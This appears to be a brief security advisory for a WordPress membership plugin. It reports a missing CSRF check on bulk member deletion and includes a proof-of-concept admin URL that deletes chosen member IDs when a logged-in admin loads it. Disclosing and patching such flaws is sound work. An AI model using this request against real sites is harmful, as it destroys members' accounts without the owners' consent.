The plugin does not have CSRF check when deleting members in bulk, which could allow attackers to make a logged in admin delete them via a CSRF attack
https://example.com/wp-admin/admin.php?page=simple_wp_membership&action=bulk_delete&members%5B0%5D=1&members%5B1%5D=2